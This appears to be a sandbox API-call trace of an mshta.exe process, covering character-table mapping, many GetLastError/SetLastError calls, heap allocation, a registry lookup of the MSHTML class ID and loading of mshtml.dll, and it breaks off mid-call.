\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜄?Ā") returned 256 [0060.590] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜄?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.590] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿʱ?溂\x97䜄?Ā", cchSrc=256, lpDestStr=0x33edd8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0060.590] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x33f4c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿðB,Ûü÷3", lpUsedDefaultChar=0x0) returned 256 [0060.590] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x97b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] GetLastError () returned 0x0 [0060.590] SetLastError (dwErrCode=0x0) [0060.590] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.591] SetLastError (dwErrCode=0x0) [0060.591] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.592] SetLastError (dwErrCode=0x0) [0060.592] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.593] SetLastError (dwErrCode=0x0) [0060.593] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.594] SetLastError (dwErrCode=0x0) [0060.594] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.595] GetLastError () returned 0x0 [0060.595] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.596] SetLastError (dwErrCode=0x0) [0060.596] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.597] SetLastError (dwErrCode=0x0) [0060.597] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.598] SetLastError (dwErrCode=0x0) [0060.598] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.599] SetLastError (dwErrCode=0x0) [0060.599] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.600] SetLastError (dwErrCode=0x0) [0060.600] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.601] GetLastError () returned 0x0 [0060.601] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.602] GetLastError () returned 0x0 [0060.602] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.603] SetLastError (dwErrCode=0x0) [0060.603] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.604] SetLastError (dwErrCode=0x0) [0060.604] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.605] SetLastError (dwErrCode=0x0) [0060.605] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.606] SetLastError (dwErrCode=0x0) [0060.606] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.607] SetLastError (dwErrCode=0x0) [0060.607] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.608] SetLastError (dwErrCode=0x0) [0060.608] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.609] SetLastError (dwErrCode=0x0) [0060.609] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.610] SetLastError (dwErrCode=0x0) [0060.610] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.611] SetLastError (dwErrCode=0x0) [0060.611] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.612] SetLastError (dwErrCode=0x0) [0060.612] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.613] SetLastError (dwErrCode=0x0) [0060.613] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.614] GetLastError () returned 0x0 [0060.614] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.615] SetLastError (dwErrCode=0x0) [0060.615] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.616] GetLastError () returned 0x0 [0060.616] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.617] SetLastError (dwErrCode=0x0) [0060.617] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.618] GetLastError () returned 0x0 [0060.618] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.619] SetLastError (dwErrCode=0x0) [0060.619] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.620] SetLastError (dwErrCode=0x0) [0060.620] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.621] SetLastError (dwErrCode=0x0) [0060.621] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.622] SetLastError (dwErrCode=0x0) [0060.622] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] SetLastError (dwErrCode=0x0) [0060.623] GetLastError () returned 0x0 [0060.623] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x42c) returned 0x201610 [0060.623] GetLastError () returned 0x0 [0060.623] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x5fc) returned 0x201a48 [0060.624] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200e78 | out: hHeap=0x200000) returned 1 [0060.625] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x972aef) returned 0x0 [0060.625] GetLastError () returned 0x0 [0060.625] GetVersion () returned 0x1db10106 [0060.625] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0060.625] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0060.625] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.626] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x105) returned 0x200e78 [0060.626] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x105) returned 0x200f88 [0060.626] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x33f85c | out: phkResult=0x33f85c*=0x42) returned 0x0 [0060.627] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x33f854, lpData=0x200e78, lpcbData=0x33f850*=0x105 | out: lpType=0x33f854*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x33f850*=0x1f) returned 0x0 [0060.722] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74af0000 [0064.685] GetProcessHeap () returned 